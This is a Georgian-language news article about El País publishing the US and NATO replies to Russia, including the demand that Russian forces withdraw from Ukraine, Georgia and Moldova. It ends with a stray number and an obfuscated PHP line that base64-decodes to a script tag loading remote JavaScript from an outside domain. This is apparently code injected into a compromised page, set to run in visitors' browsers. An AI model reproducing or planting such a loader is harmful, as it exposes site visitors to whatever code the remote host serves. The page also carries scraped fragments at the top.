celsiusi
ავერსი საქკაბელი
გამოცემა El Pais-ი აშშ-სა და ნატო-ს მიერ რუსეთისთვის გაგზავნილი დოკუმენტების ასლებს აქვეყნებს, სადაც, აღნიშნულია, რომ რუსეთმა საქართველოდან, უკრაინიდან და მოლდოვადან საკუთარი ძალები უნდა გაიყვანოს.
 
ნატო-ს მიერ გაგზავნილ პასუხში აღნიშნულია, რომ ალიანსი მტკიცედ ერთგული რჩება იმ ფუნდამენტური პრინციპების და შეთანხმებების მიმართ, რომლებიც ევროპული უსაფრთხოების საფუძველს წარმოადგენს.
 
ალიანსის დოკუმენტში ხაზგასმულია, რომ ყველა სახელმწიფომ პატივი უნდა სცეს და დაიცვას სხვა ქვეყნების სუვერენიტეტი, საზღვრების ურღვეობა და ტერიტორიული მთლიანობა და თავი შეიკავოს ძალის გამოყენებისგან და ძალის გამოყენების მუქარისგან.
 
„ყველა სახელმწიფომ პატივი უნდა სცეს სხვა სახელმწიფოების უფლებას, აირჩიონ და შეცვალონ უსაფრთხოებასთან დაკავშირებული ღონისძიებები და განსაზღვროს საკუთარი მომავალი და საგარეო პოლიტიკა გარე ჩარევის გარეშე.
 
ამ ფონზე, ჩვენ ვადასტურებთ ვალდებულებას ნატო-ს ღია კარის პოლიტიკასთან დაკავშირებით, ვაშინგტონის შეთანხმების მე-10 მუხლის შესაბამისად,“- აღნიშნულია დოკუმენტში.
 
El Pais-ის მიერ გამოქვეყნებული დოკუმენტის ასლში ასევე ხაზგასმულია, რომ რუსეთის ძალები უნდა გავიდნენ უკრაინის, საქართველოს და მოლდოვის ტერიტორიიდან.
 
„რუსეთმა უნდა გაიყვანოს საკუთარი ძალები უკრაინის, საქართველოს და მოლდოვის ტერიტორიიდან, სადაც აღნიშნული ქვეყნების თანხმობის გარეშე იმყოფებიან,“- აღნიშნულია განცხადებაში.
 
26 იანვარს შეერთებულმა შტატებმა და ნატო-მ რუსეთს მის მიერ წარდგენილ უსაფრთხოების წინადადებებთან დაკავშირებით წერილობითი პასუხები გადასცეს. აშშ-ის სახელმწიფო მდივანმა ენტონი ბლინკენმა და ნატო-ს გენერალურმა მდივანმა იენს სტოლტენბერგმა საჯაროდ ისაუბრეს დოკუმენტის ძირითად დებულებებზე და განაცხადეს, რომ დასავლეთი არ წასულა დათმობებზე რუსეთის მთავარ მოთხოვნასთან დაკავშირებით, რომლის თანახმადაც აღმოსავლეთის მიმართულებით ნატოს შემდგომი გაფართოება უნდა შეჩერდეს.
826
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");